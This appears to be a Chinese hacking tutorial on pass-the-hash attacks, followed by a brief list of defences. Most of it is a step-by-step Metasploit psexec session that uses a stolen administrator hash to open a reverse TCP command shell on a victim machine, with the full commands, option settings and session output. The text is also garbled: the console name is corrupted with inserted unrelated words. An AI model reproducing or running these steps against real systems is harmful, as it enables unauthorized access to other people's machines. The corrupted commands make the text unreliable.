传递哈希入侵技术解析

前言

~~~~~~

确保密码复杂的策略使密码不能被恶意获取，是攻击，我们将需要两个东西。首先，我们将需要被盗的管理员用户的哈希值。目前，地下组织对获取密码哈希值流行着许多不同的方法，而我们在这里需要利用Metasploit执行入侵。
Metasploit是由HDMoore免费提供的渗透测试框架。同时，我们在这里使用BT4LinuxLive，可以从http://www.backtrack-linux.org/?lang=zh下载，然后，你会发现Metasploit位于/pentest/exploits/framework3目录。
随着我们窃取的哈希值和手头的Metasploit，我们可以开始行动了。首先开启终端并访问/pentest/exploits/framework3目录，之后键入“./m单机传奇console”，这样以能够作为Metasploit启动控制台。
root@czy:~#cd/pentest/exploits/framework3/

root@czy:/pentest/exploits/framework3#./m单机传奇console

m单机传奇>
Metasploit是一个框架，对各种模块的执行取决于行为。在这种情况下，我们将使用Psexec模块。Psexec是一个很普通的工具（不是特定于Metasploit），用于执行远程系统上的进程和输出重定向数据流。为了能够使用这个模块，键入“usewindows\smb\psexec”并按回车键。之后，在Shell中的提示符会发生改变，以反映该模块正处于使用状态。
m单机传奇>usewindows/smb/psexec

m单机传奇>exploit(psexec)>
然后，我们必须设置有效载荷。一旦账户和哈希已向我们提供适当的身份严重的有效载荷，我们将使用Psexec执行。在这种情况下往往存在着许多恶意意图，而不是一个刚刚公布的具体方案，我们要执行一个命令Shell，可以用它来执行许多讨厌的且重复的命令。这样做更有效的方法之一是使用反向TCPShell。为了使用这个有效载荷，键入“setpayloadwindows/shell_reverse_tcp”。
m单机传奇exploit(psexec)>setpayloadwindows/shell_reverse_tcp

payload=>windows/shell_reverse_tcp

m单机传奇exploit(psexec)>
为了使用这个模块和有效载荷，我们不得不配置一些选项。为了我看到这些选项，你可以键入“showoptions”并按回车键。
m单机传奇exploit(psexec)>showoptions
Moduleoptions:
NameCurrentSettingRequiredDescription

--------------------------------------

RHOSTyesThetargetaddress

RHOST445yesSettheSMBserviceport

SMBPassnoThepasswordforthespecifiedusername

SMBUserAdministratoryesTheusernametoauthenticateas


Payloadoption(windows/shell_reverse_tcp):
NameCurrentSettingRequiredDescription

--------------------------------------

EXITFUNCprocessyesExittechnique:seh,thread,process

LHOSTyesThelistenaddress

LHOST4444yesThelistenport


Exploittarget:

IdName

------

0Automatic


m单机传奇exploit(psexec)>
为了配置选项，我们需要使用语法“set[选项名][值]”。其值应设置为：
·RHOST-受害者的IP地址

·SMBPass-受害者被盗的哈希

·SMBUser-受害者的用户名

·LHOST-你执行入侵行动的IP地址
在大多数情况下，仅有4个选项需要配置，其它可使用默认配置。
m单机传奇exploit(psexec)>showoptions
Moduleoptions:
NameCurrentSettingRequiredDescription

--------------------------------------

RHOST192.168.0.20yesThetargetaddress

RHOST445yesSettheSMBserviceport

SMBPassE52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586CnoThepasswordforthespecifiedusername

SMBUserAdministratoryesTheusernametoauthenticateas


Payloadoption(windows/shell_reverse_tcp):
NameCurrentSettingRequiredDescription

--------------------------------------

EXITFUNCprocessyesExittechnique:seh,thread,process

LHOST192.168.0.128yesThelistenaddress

LHOST4444yesThelistenport


Exploittarget:

IdName

------

0Automatic


m单机传奇exploit(psexec)>
到这里，所有的准备工作已经完成，我们可以执行任务了。为了做到这一点，只需键入“exploit”并按回车键即可。如果成功的话，你会看到类似以下信息，这是一个不错的Windows命令Shell。现在我们无需任何管理员用户密码即可进行控制。
m单机传奇exploit(psexec)>exploit

Startedreversehandleron192.168.0.128:4444

Connectingtotheserver...

Authenticatingasuser'admin'...

Uploadingpayload...

Created\tibpwnoK.exe...

Bindingto367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.20[\svcctl]...

Boundto367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.20[\svcctl]...

Obtainingaservicemanagerhandle...

Creatinganewservice(tlfgTpTb-"MBrTRKuKR")...

Closingservicehandle...

Openingservice...

Startingtheservice...

Removingtheservice...

Closingservicehandle...

Deleting\tibpwnoK.exe...

Commandshellsession1opened(192.168.0.128:4444->192.168.0.20:1063)atSunJul2511:20:59-04002010


(C)Copyright1985-2001MicrosoftCorp.
C:WINDOWS\system32>


防御传递哈希

~~~~~~~~~~~~~~

在身份验证的过程中，由于传递哈希的性质是难以察觉和防止的，但有一些事情你可以做：
·入侵检测系统监控-一个IDS无法检测到攻击者通过哈希入侵的特征，因为它通常看起来像一个正常的序列验证。你可能在检测的同时，攻击者已经获得了访问权限。例如，在我们的实例中，你在受害者机器上可能不会看到对哈希传递的警报，丹妮可能会看到一个psexec创建一个Shell的警告。当检测到类似的信息时并适当地作出回应，以能够判断发生的事情。

·隔离敏感系统-所有包含敏感数据的机器都应该隔离。使用适当的路由器和防火墙配置即可限制访问，只有可信主机能够访问。这将防止在不同机器企图通过哈希技术进入一个敏感的系统用户。

·双因素认证-依靠密码作为身份验证是传统的认证方式。除了密码之外，还需要考虑其它因素，这些因素是智能卡、生物识别等。通过组合这两个因素，即可阻止任何能够只有一个密码或被盗哈希的系统用户。

·限制管理访问-用户帐户越多，具有垮网络的管理权限、被盗哈希概率就越高。应该始终进行定期审计，以确定每个用户是否具有超级管理员权限。


尾声

~~~~~

通过哈希很容易完成入侵行动，对受害者机器非常致命。正如你在此文中所看到的操作以及动机，可以对目标基础设施造成完全瘫痪。希望对此入侵和检测以及预防有一个战略性的认识！如果你仍然存在着细节问题，请写信件发送到我的E-Mail（Hack01[at]Live.cn）。





 
*
*